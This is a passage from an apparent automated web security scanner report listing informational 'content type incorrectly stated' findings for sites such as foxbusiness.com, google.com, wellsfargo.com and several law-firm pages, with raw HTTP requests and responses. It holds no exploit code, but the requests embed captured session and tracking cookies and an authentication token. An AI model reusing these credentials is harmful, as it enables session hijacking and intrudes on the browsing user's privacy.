Cookie: rsi_segs=E05510_10428; __qca=P0-1763937623-1305200279382; __qseg=Q_D|Q_T|Q_3995|Q_921|Q_922|Q_928|Q_929|Q_3994|Q_924|Q_2113|Q_2112|Q_2151|Q_2145|Q_2156|Q_2120; s_pers=%20s_vnum%3D1307792281979%2526vn%253D1%7C1307792281979%3B%20s_invisit%3Dtrue%7C1305202081979%3B%20omtr_lv%3D1305200281982%7C1399808281982%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305202081982%3B%20s_nr%3D1305200281985%7C1307792281985%3B%20s_prop45_cvp%3D%255B%255B%2527Referrers%2527%252C%25271305200281991%2527%255D%255D%7C1463053081991%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefineddealbook.nytimes.comdealbook.nytimes.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-FoxNews-EdgeTTL: 20m
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache
Date: Thu, 12 May 2011 11:38:06 GMT
Connection: close
Content-Length: 150

{"authentication":{"message":"User logged out, session invalidated","status":"ok","dqs":"e30= c5d5d037748a67e6b04679c3eadc2d7b0b1486fb 1305198974"}}

28.45. http://www.foxbusiness.com/static/all/generated/js/fb2-breaking-news.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.foxbusiness.com
Path:	/static/all/generated/js/fb2-breaking-news.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /static/all/generated/js/fb2-breaking-news.js HTTP/1.1
Host: www.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=E05510_10428; __qca=P0-1763937623-1305200279382; __qseg=Q_D|Q_T|Q_3995|Q_921|Q_922|Q_928|Q_929|Q_3994|Q_924|Q_2113|Q_2112|Q_2151|Q_2145|Q_2156|Q_2120

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 11 May 2011 15:51:32 GMT
ETag: "1d7c726-19-bea2900"
Accept-Ranges: bytes
X-FoxNews-EdgeTTL: 2m
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=29
Expires: Thu, 12 May 2011 11:38:35 GMT
Date: Thu, 12 May 2011 11:38:06 GMT
Connection: close
Content-Length: 25

fox_header_breakingnews()

28.46. http://www.foxbusiness.com/static/all/img/global/logo-disqus-1.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.foxbusiness.com
Path:	/static/all/img/global/logo-disqus-1.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /static/all/img/global/logo-disqus-1.gif HTTP/1.1
Host: www.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=E05510_10428; __qca=P0-1763937623-1305200279382; __qseg=Q_D|Q_T|Q_3995|Q_921|Q_922|Q_928|Q_929|Q_3994|Q_924|Q_2113|Q_2112|Q_2151|Q_2145|Q_2156|Q_2120; s_pers=%20s_vnum%3D1307792281979%2526vn%253D1%7C1307792281979%3B%20s_invisit%3Dtrue%7C1305202081979%3B%20omtr_lv%3D1305200281982%7C1399808281982%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305202081982%3B%20s_nr%3D1305200281985%7C1307792281985%3B%20s_prop45_cvp%3D%255B%255B%2527Referrers%2527%252C%25271305200281991%2527%255D%255D%7C1463053081991%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefineddealbook.nytimes.comdealbook.nytimes.com%3B%20s_sq%3D%3B; p_DQS=e30%3D%20c5d5d037748a67e6b04679c3eadc2d7b0b1486fb%201305198974

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 11 May 2011 18:05:03 GMT
ETag: "1d5cae7-488-e96851c0"
Accept-Ranges: bytes
Content-Length: 1160
Content-Type: image/gif
Cache-Control: max-age=7084
Date: Thu, 12 May 2011 11:38:13 GMT
Connection: close

.PNG
.
...IHDR...D.........&_A...OIDATx.u..O.I..`..O@..B.xd.s..d..dD.8....)h..\I.....~U.U........]]]]__.......g....................o..........>::z~~.x....2....0Ni..G............../....lnn...ZZZ...
...[SNIP]...

28.47. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.google.com
Path:	/search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Apollo+Global+Management HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: vD843DpA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:38:21 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 21875

ShjDd-Or....S....L..'..}.........vs#...Apollo Global Management.7%..krcbLTYDOKsby0gGQ8-jFBg",kEXPI:"17259,24472,25907,27147,28505,28766,28887,29229,29509,29685,29795,29822,30035,30107,30152,30275",kCS
...[SNIP]...

28.48. http://www.hbsr.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.hbsr.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:30 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Jun 2010 21:40:13 GMT
ETag: "1170692-37e-48812ef55a940"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ............................... .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..J0.t`..........fP.... .. .. .. .. .. .. .. .. ........fP.X@.t`.......... .. .. .. .. .. ..
...[SNIP]...

28.49. http://www.korteco.com/sites/all/themes/korteco/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.korteco.com
Path:	/sites/all/themes/korteco/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/all/themes/korteco/favicon.ico HTTP/1.1
Host: www.korteco.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESS31e5fbde7def436979bdb9291b5781da=0evqcgbv3nlct72jq5nho296j5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:11:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 25 Feb 2011 17:35:38 GMT
ETag: "467932a-37e-c21b6e80"
Accept-Ranges: bytes
Content-Length: 894
Cache-Control: max-age=1209600
Expires: Thu, 26 May 2011 13:11:26 GMT
Connection: close
Content-Type: text/plain

..............h.......(....... ...........@........................................................................................u..t..~................................{..o..............g..q........
...[SNIP]...

28.50. http://www.mimecast.com/Global/HeaderTitleVideos/Images/SecurityV4.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mimecast.com
Path:	/Global/HeaderTitleVideos/Images/SecurityV4.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /Global/HeaderTitleVideos/Images/SecurityV4.png HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/What-we-offer/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: image/png
Expires: Wed, 11 May 2011 12:38:18 GMT
Last-Modified: Tue, 18 Jan 2011 14:56:52 GMT
ETag: "1CBB71FF145C4AF"
Date: Thu, 12 May 2011 12:38:18 GMT
Content-Length: 76453

......Exif..II*.................Ducky.......P.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

28.51. http://www.moritthock.com/index.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.moritthock.com
Path:	/index.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Content-Length: 11
Content-Type: text/html

Invalid URI

28.52. http://www.nytimes.com/adx/bin/adx_remote.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.nytimes.com
Path:	/adx/bin/adx_remote.html

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

28.53. http://www.privateequityinfo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.privateequityinfo.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bvv46lr2q5ms0uqefrt9jbsal0; __utma=222922074.264370130.1305198145.1305198145.1305198145.1; __utmb=222922074; __utmc=222922074; __utmz=222922074.1305198145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:36 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 30 Nov 2010 21:37:36 GMT
ETag: "43803d-e37-4964bff40e800"
Accept-Ranges: bytes
Content-Length: 3639
Content-Type: text/plain

..............h...&... ..............(....... ...........@...........................K...JJJ.....www.%%%.....*\u.....bbb.............:::.........J....#-...........-.ooo.*Uj.AAA.[[[................. .
...[SNIP]...

28.54. http://www.privateequityinfo.com/grfx/grfx2009/topmenu/shadow.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.privateequityinfo.com
Path:	/grfx/grfx2009/topmenu/shadow.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /grfx/grfx2009/topmenu/shadow.jpg HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
Referer: http://www.privateequityinfo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bvv46lr2q5ms0uqefrt9jbsal0; __utma=222922074.264370130.1305198145.1305198145.1305198145.1; __utmb=222922074; __utmc=222922074; __utmz=222922074.1305198145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:28 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 30 Nov 2010 21:37:41 GMT
ETag: "1120005-128-4964bff8d3340"
Accept-Ranges: bytes
Content-Length: 296
Content-Type: image/jpeg

......JFIF.....H.H.....C.............................................. ....................C............
.
...................................................................................... .
...[SNIP]...

28.55. http://www.tuckerellis.com/tucker-favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tuckerellis.com
Path:	/tucker-favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /tucker-favicon.ico HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 16 Apr 2009 13:44:14 GMT
ETag: "787a4-57e-42776780"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ....................................j...o...l...........q...........w...j........&..j...........l.......l.......n...w........'..p
......l....O..l...r..h...............w
...[SNIP]...

28.56. https://www.usaa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.usaa.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

28.57. https://www.wellsfargo.com/img/theprivatebank/apa.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.wellsfargo.com
Path:	/img/theprivatebank/apa.jpg

Issue detail

The response contains the following Content-type statement:

Content-type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /img/theprivatebank/apa.jpg HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/theprivatebank/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=5FAD486523BA40FE; wcmcookiewf=q39sNL1C21cRpNPhyX176LS1LfV5GQpFwBBZ1zG9LhXy0G6bDGLV!-1927433398; wfacookie=B-20110512040746277056405; ISD_WCM_COOKIE=859970570.16927.0000

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 12 May 2011 11:09:27 GMT
Content-length: 7891
Content-type: image/jpeg
Last-modified: Sat, 13 Nov 2010 13:36:14 GMT
Etag: "1ed3-4cde944e"
Accept-ranges: bytes

GIF89aW.........lmp.w NOR.a;............}~..........Z[^......!.......,....W......p.I..8....`(.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.....z.n....|N.....~....r....;..y....T
...;..y..
U...
...[SNIP]...

28.58. http://www.wolfgreenfield.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wolfgreenfield.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:12 GMT
Server: Apache/2.0.64 (Red Hat)
Last-Modified: Tue, 29 Jul 2008 19:11:49 GMT
ETag: "1e8c7bb-e36-696a0740"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain

..............h...&... ..............(....... ...........@.............................i._=......~c>.....;........yV.....I/....u.......................r.......s.Z7...].....A&........................
...[SNIP]...

28.59. http://www.wolfgreenfield.com/javascript/c_smartmenus.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.wolfgreenfield.com
Path:	/javascript/c_smartmenus.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /javascript/c_smartmenus.js HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:05 GMT
Server: Apache/2.0.64 (Red Hat)
Last-Modified: Tue, 29 Jul 2008 19:11:31 GMT
ETag: "1e985d8-45d5-68575ec0"
Accept-Ranges: bytes
Content-Length: 17877
Connection: close
Content-Type: application/x-javascript

/*
========================================
SmartMenus v6.0.2 Script Core
Commercial License No.: UN-LICENSED
========================================
Please note: THIS IS NOT FREE SOFTWARE.
Licen
...[SNIP]...

29. Content type is not specified previous next
There are 4 instances of this issue:

http://ad.yieldmanager.com/st
http://lfov.net/webrecorder/g/chimera.js
http://lfov.net/webrecorder/js/listen.js
https://webmail-us.mimecast.com/favicon.ico

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

29.1. http://ad.yieldmanager.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Request

GET /st?anmember=541&anprice=&ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!Q!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; pv1="b!!!!:!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~"; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; bh="b!!!%+!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!,<yq][!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+